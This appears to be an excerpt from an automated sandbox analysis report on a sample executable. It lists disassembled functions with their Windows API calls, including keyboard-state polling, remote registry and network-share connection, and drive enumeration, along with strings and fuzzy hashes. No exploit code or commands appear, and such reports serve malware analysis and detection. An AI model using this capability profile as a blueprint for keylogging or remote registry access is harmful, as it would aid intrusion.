                                                                                                                                                                  • Instruction Fuzzy Hash: FA128D35A012689FCB20CF25CD84AEAB7B4FF06354F0401DAE41AD6A91D7389EC1CF96
                                                                                                                                                                  Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                                                                                                  • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                                                  • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                                                                  • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                                                                                                  • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                                                                  • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                                                                                                                  Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                                                                                                  • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                                                                                                  • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                                                                                                  • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3096461208-0
                                                                                                                                                                  • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                                                                  • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                                                                                                                  • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                                                                  • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                                                                                                                  Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                                                                                                                  • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0047151E
                                                                                                                                                                  • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                                                                                                                  • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                                                                                                                  • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                                                                                                                  • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                                                                                                                  • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004715EA
                                                                                                                                                                  • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3218148540-0
                                                                                                                                                                  • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                                                                  • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                                                                                                  • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                                                                  • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                                                                                                  Function 0046163E Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                                                                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                                                                                                                  • GetParent.USER32(?), ref: 004618C3
                                                                                                                                                                  • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                                                                                                                  • String ID: %s%u
                                                                                                                                                                  • API String ID: 1412819556-679674701
                                                                                                                                                                  • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                                                                                  • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                                                                                                                  • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                                                                                  • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                                                                                                                  Function 00478656 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 197COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                                                                  • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BuffCharDriveLowerType
                                                                                                                                                                  • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                  • API String ID: 2426244813-2127371420
                                                                                                                                                                  • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                                                                  • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                                                                                                  • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                                                                  • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                                                                                                                  Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                                                                                                                  • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                                                                                                                  • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                                                                                                                  • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                                                                                  • String ID: 2
                                                                                                                                                                  • API String ID: 1331449709-450215437
                                                                                                                                                                  • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                                                                                  • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                                                                                                                  • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                                                                                  • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                                                                                                                  Function 00460879 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 136windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                                                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                                                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleLoadModuleString$Message
                                                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                  • API String ID: 4072794657-2268648507
                                                                                                                                                                  • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                                                                  • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                                                                                                  • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                                                                  • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                                                                                                  Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                                                                                                  • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                                                                                                  • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                                                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                  • API String ID: 3030280669-22481851
                                                                                                                                                                  • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                                                                  • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                                                                                                  • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                                                                                  • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                                                                                                  Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DestroyWindow
                                                                                                                                                                  • String ID: static
                                                                                                                                                                  • API String ID: 3375834691-2160076837
                                                                                                                                                                  • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                                                                  • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                                                                                                  • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                                                                                  • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                                                                                                  Function 004341E6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 91windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadIconW.USER32(00000000,00007F04), ref: 004342D1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: IconLoad
                                                                                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                                                                                  • API String ID: 2457776203-404129466
                                                                                                                                                                  • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                                                                  • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                                                                                                                  • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                                                                  • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                                                                                                                  Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                                                                                                  • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$DriveType
                                                                                                                                                                  • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                                                                                                  • API String ID: 2907320926-3566645568
